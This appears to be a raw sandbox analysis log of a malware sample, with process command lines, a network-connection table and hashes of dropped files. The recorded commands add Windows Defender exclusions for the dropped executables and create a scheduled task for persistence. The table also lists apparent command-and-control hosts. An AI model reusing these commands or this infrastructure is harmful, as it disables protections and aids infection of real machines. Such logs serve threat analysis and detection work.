"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GJgncWe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GJgncWe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp21E7.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.134.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 234.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
FR 194.59.30.220:1336 tcp
US 8.8.8.8:53 220.30.59.194.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
RU 31.41.244.12:80 31.41.244.12 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
FR 142.250.179.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 238.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.73:80 r11.o.lencr.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 96.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 grahm.xyz udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 31.10.203.116.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 fightlsoser.click udp
US 104.21.35.43:443 fightlsoser.click tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 2.18.190.73:80 e5.o.lencr.org tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 43.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 infect-crackle.cyou udp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 167.216.67.172.in-addr.arpa udp
US 172.67.206.64:443 covery-mover.biz tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 66.45.226.53:7777 66.45.226.53 tcp
US 8.8.8.8:53 218.172.154.94.in-addr.arpa udp
US 8.8.8.8:53 53.226.45.66.in-addr.arpa udp
RU 89.169.16.117:8000 tcp
RU 178.215.118.86:2000 tcp
RU 89.169.1.55:5000 tcp
RU 89.169.41.167:49152 tcp
RU 89.169.16.117:554 tcp
RU 89.169.41.157:902 tcp
RU 178.215.74.228:8011 tcp
RU 89.169.41.142:2000 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
RU 83.217.192.193:22 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 228.74.215.178.in-addr.arpa udp
US 8.8.8.8:53 193.192.217.83.in-addr.arpa udp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.99:443 t.me tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.75.238:443 drive.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8080 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 drive-connect.cyou udp
US 104.21.79.7:443 drive-connect.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
DE 101.99.92.189:8080 tcp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 7.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
FR 142.250.75.238:443 drive.google.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 f0706909.xsph.ru udp
RU 141.8.193.236:80 f0706909.xsph.ru tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:50754 tcp
N/A 127.0.0.1:50936 tcp
DE 84.118.224.155:9001 tcp
LT 213.252.245.153:8080 tcp
US 8.8.8.8:53 153.245.252.213.in-addr.arpa udp
DE 188.68.50.76:9001 tcp
FI 95.217.112.243:443 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 76.50.68.188.in-addr.arpa udp
US 8.8.8.8:53 243.112.217.95.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
GB 51.195.138.197:10343 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 197.138.195.51.in-addr.arpa udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 freegeoip.app udp
US 104.21.73.97:443 freegeoip.app tcp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 ipbase.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 97.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 172.67.209.71:443 ipbase.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 154.216.17.90:80 tcp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 awake-weaves.cyou udp
US 172.67.143.116:443 awake-weaves.cyou tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 immureprech.biz udp
US 172.67.207.38:443 immureprech.biz tcp
US 8.8.8.8:53 116.143.67.172.in-addr.arpa udp
US 8.8.8.8:53 38.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.32.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 104.21.74.196:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 jrqh-hk.com udp
US 8.8.8.8:53 id71.internetid.ru udp
US 8.8.8.8:53 1.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 196.74.21.104.in-addr.arpa udp
CN 123.136.92.99:80 jrqh-hk.com tcp
RU 95.213.205.83:5655 id71.internetid.ru tcp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 104.21.27.63:443 sordid-snaked.cyou tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 83.205.213.95.in-addr.arpa udp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
US 8.8.8.8:53 63.27.21.104.in-addr.arpa udp
GB 104.124.170.33:443 steamcommunity.com tcp
RU 109.234.156.179:5655 tcp
US 8.8.8.8:53 179.156.234.109.in-addr.arpa udp
US 8.8.8.8:53 33.170.124.104.in-addr.arpa udp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 ship-amongst.gl.at.ply.gg udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 24.221.185.147.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 154.216.17.90:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 testinghigger-42471.portmap.host udp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
N/A 192.168.56.1:4782 tcp
US 8.8.8.8:53 updates.signiant.com udp
DE 13.32.121.48:80 updates.signiant.com tcp
US 8.8.8.8:53 48.121.32.13.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 13.248.156.178:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 178.156.248.13.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
RU 31.41.244.10:80 31.41.244.10 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 20.83.148.22:80 tcp
N/A 192.168.56.1:4782 tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 webcdn.triongames.com udp
GB 2.18.190.83:80 webcdn.triongames.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 83.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
DE 87.120.84.32:80 87.120.84.32 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 8.8.8.8:53 get.geojs.io udp
US 104.26.1.100:443 get.geojs.io tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
US 8.8.8.8:53 100.1.26.104.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 94.156.177.133:7000 tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 boot-01.net.anydesk.com udp
DE 195.181.174.173:443 boot-01.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:80 relay-d4aa0625.net.anydesk.com tcp
US 8.8.8.8:53 173.174.181.195.in-addr.arpa udp
US 8.8.8.8:53 164.141.128.57.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
US 154.216.17.90:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
DE 57.129.19.1:443 boot.net.anydesk.com tcp
DE 57.129.19.1:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:443 relay-d4aa0625.net.anydesk.com tcp
US 8.8.8.8:53 1.19.129.57.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 api.playanext.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
DE 18.245.86.105:80 api.playanext.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 105.86.245.18.in-addr.arpa udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 192.168.56.1:4782 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
FR 142.250.75.227:443 gstatic.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
HK 47.244.167.171:801 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 171.167.244.47.in-addr.arpa udp
US 192.210.150.26:3678 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:3678 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
GB 89.35.131.209:80 sanboxland.pro tcp
US 192.210.150.26:3678 tcp
DE 18.245.86.105:80 api.playanext.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:3678 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:3678 tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 0.130.122.193.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 192.210.150.26:3678 tcp

Files

memory/3128-0-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp

memory/3128-1-0x00000000000C0000-0x00000000000C8000-memory.dmp

memory/3128-2-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

memory/3128-3-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp

memory/3128-4-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\AppData\Local\Temp\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

memory/4828-36-0x0000015588F50000-0x0000015588F68000-memory.dmp

memory/4828-37-0x00000155A3560000-0x00000155A3722000-memory.dmp

memory/4828-38-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

memory/4828-39-0x00000155A3D60000-0x00000155A4288000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 3626532127e3066df98e34c3d56a1869
SHA1 5fa7102f02615afde4efd4ed091744e842c63f78
SHA256 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512 dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 045b0a3d5be6f10ddf19ae6d92dfdd70
SHA1 0387715b6681d7097d372cd0005b664f76c933c7
SHA256 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA512 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 cea368fc334a9aec1ecff4b15612e5b0
SHA1 493d23f72731bb570d904014ffdacbba2334ce26
SHA256 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
SHA512 bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 0dc4014facf82aa027904c1be1d403c1
SHA1 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256 a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512 cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 b7d1e04629bec112923446fda5391731
SHA1 814055286f963ddaa5bf3019821cb8a565b56cb8
SHA256 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA512 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 7187cc2643affab4ca29d92251c96dee
SHA1 ab0a4de90a14551834e12bb2c8c6b9ee517acaf4
SHA256 c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830
SHA512 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5659eba6a774f9d5322f249ad989114a
SHA1 4bfb12aa98a1dc2206baa0ac611877b815810e4c
SHA256 e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4
SHA512 f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 579a63bebccbacab8f14132f9fc31b89
SHA1 fca8a51077d352741a9c1ff8a493064ef5052f27
SHA256 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0
SHA512 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

memory/1364-115-0x00007FF6E3450000-0x00007FF6E38E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe

MD5 63c4e3f9c7383d039ab4af449372c17f
SHA1 f52ff760a098a006c41269ff73abb633b811f18e
SHA256 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd
SHA512 dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf

C:\Users\Admin\AppData\Local\Temp\main\in.exe

MD5 83d75087c9bf6e4f07c36e550731ccde
